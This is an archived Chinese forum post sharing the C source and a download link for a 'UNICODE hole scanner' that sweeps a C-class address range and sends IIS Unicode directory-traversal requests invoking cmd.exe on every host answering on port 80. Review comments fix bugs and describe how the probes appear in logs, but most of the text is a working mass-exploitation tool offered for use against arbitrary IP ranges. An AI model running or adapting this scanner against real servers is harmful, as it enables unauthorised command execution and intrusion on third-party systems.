发信人: maxview()
整理人: williamlong(2001-05-18 12:19:39), 站内信件
最近有朋友要这个程序的执行文件,我编译了一个,做到了主页上,有需要的朋友请自行去下载:http://idwin.163.net/index.htm
这个版本我将IP地址的扫描设定成了一个c段,使用方法是:scan xxx.xxx.xxx.*
其中的星号代表从1到255的主机号。因为程序是单线程的,所以有点慢,我会尽快改进
另外这次还增加了另外几个UNICODE,这样就将程序所能扫描的漏洞完整了
/* UNICODE hole scanner. The version is 0.5 */
#include <stdio.h>
#include <string.h>
#include <winsock.h>
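/*
 * Walk one C-class range (a.b.c.1 .. a.b.c.255) and, for every host that
 * accepts a TCP connection on port 80, send five GET requests that try to
 * reach winnt/system32/cmd.exe through /scripts/ by putting a percent-escaped
 * two-byte sequence (%c1%1c, %c1%9c, %c0%af, %c0%2f) between the dots where a
 * plain path separator would be rejected. A reply containing the text in
 * fmsg is reported as a hit; anything else prints a dot.
 *
 * Usage: scan a.b.c.*    (a trailing '*' is stripped and replaced by 1..255)
 *
 * Returns 1 on bad usage or on a setup failure, 0 after the full sweep.
 *
 * Review notes:
 *  - Replies are untrusted network input. recv() does not NUL-terminate, so
 *    the buffer is terminated by hand before strstr() and is emptied when
 *    nothing was received; otherwise a previous reply left in buff would be
 *    matched again and reported as a new finding.
 *  - The match is on the status text only. A server that answers 200 with a
 *    custom page is reported as a hit, so a hit is a lead to verify, not proof.
 *  - All five requests go down one connection and each is a bare HTTP/1.0
 *    request. A server that closes after its first reply leaves B..E
 *    unanswered, so a '.' for those means "no reply seen", not "not affected".
 *  - exE is byte-for-byte the same request as exB; the E result adds nothing.
 *  - Detection: in web server access logs these probes show up as GETs under
 *    /scripts/ whose path contains %c0 or %c1 escapes and ends at
 *    winnt/system32/cmd.exe, repeated across consecutive addresses.
 */
int main(int argc, char *argv[])
{
    if (argc != 2) {
        printf("\nUNICODE hole scanner by Maxview. Ver 0.5\n");
        printf("Useage : scan [IP address] (C-class)\n");
        printf("Example: scan 202.100.2.* OR scan 211.17.65.*\n");
        return 1;
    }

    SOCKET sock;                    /* SOCKET, not int: it is compared with INVALID_SOCKET */
    struct sockaddr_in blah;
    struct hostent *he;
    WSADATA wsaData;
    WORD wVersionRequested = MAKEWORD(1, 1);
    char buff[1024];
    char *exA = "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
    char *exB = "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
    char *exC = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
    char *exD = "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
    char *exE = "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
    char *fmsg = "HTTP/1.1 200 OK";
    char *probes[5];
    char host[1000];
    char net[1000];
    size_t hostlen;
    int i;
    int p;

    probes[0] = exA;
    probes[1] = exB;
    probes[2] = exC;
    probes[3] = exD;
    probes[4] = exE;

    /* strncpy leaves the buffer unterminated when the source fills it. */
    strncpy(host, argv[1], sizeof host - 1);
    host[sizeof host - 1] = '\0';

    /* Guard the empty string: strlen(host) - 1 would index before the buffer. */
    hostlen = strlen(host);
    if (hostlen > 0 && host[hostlen - 1] == '*') {
        host[hostlen - 1] = '\0';
    }

    /* Winsock is initialised once for the sweep instead of once per host. */
    if (WSAStartup(wVersionRequested, &wsaData)) {
        printf("Winsock Initialization failed.\n");
        return 1;
    }

    for (i = 1; i < 256; i++) {
        /* host may be 999 chars long; an unbounded sprintf could overrun net. */
        int written = snprintf(net, sizeof net, "%s%d", host, i);
        if (written < 0 || (size_t)written >= sizeof net) {
            WSACleanup();
            return 1;
        }

        /* One socket per host; the original created a second one here and
         * leaked the first handle on every iteration. */
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock == INVALID_SOCKET) {
            printf("Can not create socket.\n");
            WSACleanup();
            return 1;
        }

        memset(&blah, 0, sizeof blah);
        blah.sin_family = AF_INET;
        blah.sin_port = htons(80);

        he = gethostbyname(net);
        if (he != NULL && he->h_length == (int)sizeof blah.sin_addr.s_addr) {
            /* Copy a fixed size: h_length comes from the resolver reply. */
            memcpy(&blah.sin_addr.s_addr, he->h_addr, sizeof blah.sin_addr.s_addr);
        } else {
            blah.sin_addr.s_addr = inet_addr(net);
            if (blah.sin_addr.s_addr == INADDR_NONE) {
                closesocket(sock);
                WSACleanup();
                return 1;
            }
        }

        if (connect(sock, (struct sockaddr *)&blah, sizeof blah) == 0) {
            for (p = 0; p < 5; p++) {
                int got;

                send(sock, probes[p], (int)strlen(probes[p]), 0);

                /* Leave room for the terminator and never search stale data. */
                got = recv(sock, buff, (int)sizeof buff - 1, 0);
                if (got > 0) {
                    buff[got] = '\0';
                } else {
                    buff[0] = '\0';
                }

                if (strstr(buff, fmsg) != NULL) {
                    printf("\nFound an UNICODE-%c hole in %s %s\n", 'A' + p, net, probes[p]);
                } else {
                    printf(".");
                }
            }
        } else {
            printf("Can not connect the address.\n");
        }

        closesocket(sock);
    }

    WSACleanup();
    return 0;
}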